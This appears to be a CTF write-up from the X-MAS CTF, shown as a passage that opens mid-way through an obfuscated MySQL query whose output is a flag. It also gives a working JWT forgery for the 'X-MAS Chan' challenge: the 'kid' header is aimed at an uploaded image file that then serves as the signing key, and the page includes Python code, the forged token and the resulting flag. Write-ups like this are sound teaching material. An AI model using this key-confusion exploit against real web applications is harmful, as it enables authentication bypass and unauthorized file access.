                                                                           FROM FLAG 
                                                                           WHERE id LIKE '20'), 
                                                                    ( 
                                                                           SELECT n 
                                                                           FROM FLAG 
                                                                           WHERE id IN ('50', 
                                                                                         '51', 
                                                                                         substr('121', 2, 2)))))))))), 'D', 'A'), -16, 16), 1)),
                                                      ( 
                                                             SELECT space(6))))))) = concat_ws('00','A3','43','75','A4',''), 0, @pc:=89)
                              WHEN 13 THEN 
                                     ( 
                                            SELECT @f := n 
                                            FROM FLAG 
                                            WHERE id = 3) 
                              WHEN 44 THEN @l := 1 
                              WHEN 65 THEN @i := 33 
                              WHEN 48 THEN IF(@l > find_in_set('x','a,b,c,d'), @pc:=89, 0) 
                              WHEN 110 THEN @rv := @rv * @n 
                              WHEN 125 THEN @out := @notok 
                              WHEN 127 THEN 0 
                              WHEN 4 THEN @targetsz := 42 
                              WHEN 5 THEN 
                                     ( 
                                            SELECT @dat := coalesce(NULL, NULL, group_concat(n SEPARATOR ''), 'X-MAS') 
                                            FROM FLAG) 
                              WHEN 116 THEN @get_arg_tmp := @sp-2 
                              WHEN 23 THEN @sp := @sp  + 1 
                              WHEN 105 THEN @sp := @sp + 1 
                              WHEN 22 THEN @mem:=updatexml(@mem,'/m[$@sp]',concat('<m>',@pc+2,'</m>'))
                              WHEN 15 THEN @prt := concat( 
                                     ( 
                                            SELECT n 
                                            FROM FLAG 
                                            WHERE id = 4), 
                                     ( 
                                            SELECT n 
                                            FROM FLAG 
                                            WHERE id = 7), 
                                     ( 
                                            SELECT n 
                                            FROM FLAG 
                                            WHERE id = 24)) 
                              WHEN 14 THEN IF(ascii(@e) + ascii(@f) = 153, 0, @pc:=89) 
                              WHEN 54 THEN @prt := 
                                     ( 
                                            SELECT n 
                                            FROM FLAG 
                                            WHERE id IN (substr(REPEAT(rpad(soundex('doggo'), 2, '?'), 2), 4, 1) * 7 + 1))
                              WHEN 72 THEN @l := @l + 1 
                              WHEN 77 THEN 0 
                              WHEN 118 THEN @rv := 1 
                              WHEN 27 THEN @mem:=updatexml(@mem,'/m[$@sp]',concat('<m>',@prt,'</m>'))
                              WHEN 76 THEN IF(@l > locate(find_in_set('p','abcdefghijklmnoqrstuvwxyz'), '1'), @pc:=124, 0)
                              WHEN 7 THEN 
                                     ( 
                                            SELECT @e := n 
                                            FROM FLAG 
                                            WHERE id = 0) 
                              WHEN 40 THEN 
                                     ( 
                                            SELECT @e := concat( 
                                                   ( 
                                                          SELECT n 
                                                          FROM FLAG 
                                                          WHERE id = @i))) 
                              WHEN 79 THEN @pc:=126 
                              WHEN 124 THEN 0 
                              WHEN 66 THEN @l := 0 
                              WHEN 57 THEN @mem:=updatexml(@mem,'/m[$@sp]',concat('<m>',52,'</m>'))
                              WHEN 67 THEN 0 
                              WHEN 75 THEN IF(@i < 41, @pc:=67, 0) 
                              ELSE @out 
                       end, 
                       @pc:=@pc+1 
                FROM   ( 
                                  SELECT     (e0.v+e1.v+e2.v+e3.v+e4.v+e5.v+e6.v+e7.v+e8.v+e9.v+e10.v) v
                                  FROM      ( 
                                                    SELECT 0 v 
                                                    UNION ALL 
                                                    SELECT 1 v) e0 
                                  CROSS JOIN 
                                             ( 
                                                    SELECT 0 v 
                                                    UNION ALL 
                                                    SELECT 2 v) e1 
                                  CROSS JOIN 
                                             ( 
                                                    SELECT 0 v 
                                                    UNION ALL 
                                                    SELECT 4 v) e2 
                                  CROSS JOIN 
                                             ( 
                                                    SELECT 0 v 
                                                    UNION ALL 
                                                    SELECT 8 v) e3 
                                  CROSS JOIN 
                                             ( 
                                                    SELECT 0 v 
                                                    UNION ALL 
                                                    SELECT 16 v) e4 
                                  CROSS JOIN 
                                             ( 
                                                    SELECT 0 v 
                                                    UNION ALL 
                                                    SELECT 32 v) e5 
                                  CROSS JOIN 
                                             ( 
                                                    SELECT 0 v 
                                                    UNION ALL 
                                                    SELECT 64 v) e6 
                                  CROSS JOIN 
                                             ( 
                                                    SELECT 0 v 
                                                    UNION ALL 
                                                    SELECT 128 v) e7 
                                  CROSS JOIN 
                                             ( 
                                                    SELECT 0 v 
                                                    UNION ALL 
                                                    SELECT 256 v) e8 
                                  CROSS JOIN 
                                             ( 
                                                    SELECT 0 v 
                                                    UNION ALL 
                                                    SELECT 512 v) e9 
                                  CROSS JOIN 
                                             ( 
                                                    SELECT 0 v 
                                                    UNION ALL 
                                                    SELECT 1024 v) e10 
                                  ORDER BY   v) s) q 
ORDER BY v DESC 
LIMIT    1

Just follow select query, then we can get a flag.

X-MAS{Wooat???_4_VM_1n_My_SQL???_mnohijkd}

X-MAS Chan

There is jwt that named banner.

// Header
{
  "typ":"JWT",
  "alg":"HS256",
  "kid":"\/tmp\/jwt.key" // Points key file path.
}

// Body
{
  "banner":"banner\/3.png" // Banner file's path.
}

Upload any image file, and we can use that image as a key.

import jwt

with open('03sunf.gif', 'rb') as fp:
    key = fp.read()

print(jwt.encode({'banner': 'flag.php'}, key, algorithm='HS256', headers={'kid': '/var/www/html/b/src/1607782651348.gif'}))
eyJ0eXAiOiJKV1QiLCJhbGciOiJIUzI1NiIsImtpZCI6Ii92YXIvd3d3L2h0bWwvYi9zcmMvMTYwNzc4MjY1MTM0OC5naWYifQ.eyJiYW5uZXIiOiJmbGFnLnBocCJ9.s6ImAyuDOFMQ_KtFtD3AtVXT2kMIFohKPGNj85tWX-0
X-MAS{n3v3r_trust_y0ur_us3rs_k1ds-b72dcf5a49498400}
Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment